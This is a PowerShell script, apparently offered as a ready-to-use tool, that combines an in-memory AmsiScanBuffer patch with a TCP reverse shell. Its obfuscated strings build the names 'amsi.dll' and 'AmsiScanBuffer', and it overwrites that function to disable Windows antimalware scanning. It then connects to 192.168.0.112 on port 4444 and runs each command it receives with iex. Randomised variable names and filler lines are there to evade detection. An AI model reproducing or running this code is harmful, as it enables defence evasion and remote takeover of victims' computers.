powershell UD amsi revshell script

ud_amsi_revshell.ps1

#Rasta-mouses Amsi-Scan-Buffer patch \n
$ynfhj = @"
using System;
using System.Runtime.InteropServices;
public class ynfhj {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr epfkrh, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $ynfhj

$gjrnhhu = [ynfhj]::LoadLibrary("$([CHAr]([byte]0x61)+[chAr](109*41/41)+[cHAr](115*88/88)+[char](105+33-33)+[CHAR](10+36)+[chaR]([BYTe]0x64)+[cHaR](108)+[CHAR](108*49/49))")
$veratw = [ynfhj]::GetProcAddress($gjrnhhu, "$([CHaR]([bYTE]0x41)+[cHAR](83+26)+[chAR](46+69)+[chAr]([bYte]0x69)+[chaR]([BYte]0x53)+[chaR]([ByTe]0x63)+[ChAr](69+28)+[cHaR]([bYTE]0x6e)+[Char]([BYTE]0x42)+[cHAR](117)+[Char](102)+[cHAR]([bYte]0x66)+[CHAR]([BytE]0x65)+[ChaR]([bYTE]0x72))")
$p = 0

$qcjh = "0xB8"
[ynfhj]::VirtualProtect($veratw, [uint32]5, 0x40, [ref]$p)
$fkyv = "0xC3"
$gbjf = "0x57"
$iton = "0x07"
$wran = "0x00"
$bgml = "0x80"
$uggea = [Byte[]] ($qcjh,$gbjf,$wran,$iton,+$bgml,+$fkyv)
$mom = [System.Runtime.InteropServices.Marshal]
$mom::Copy($uggea, 0, $veratw, 6)

$fghn = New-Object System.Net.Sockets.TCPClient('192.168.0.112', 4444)
$fsdf = 1
$dsfsdf = $fghn.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $dsfsdf.Read($bytes, 0, $bytes.Length)) -ne 0) {
    $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i)
    $fsdf = 1
    $sendback = (iex $data 2>&1 | Out-String )
    $fsdf = 1
    $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '
    $fsdf = 1
    $sdfsdfds = ([text.encoding]::ASCII).GetBytes($sendback2)
    $fsdf = 1
    $len = $sdfsdfds.Length
    $dsfsdf.Write($sdfsdfds, 0, $len)
    $dsfsdf.Flush()
}
$fghn.Close()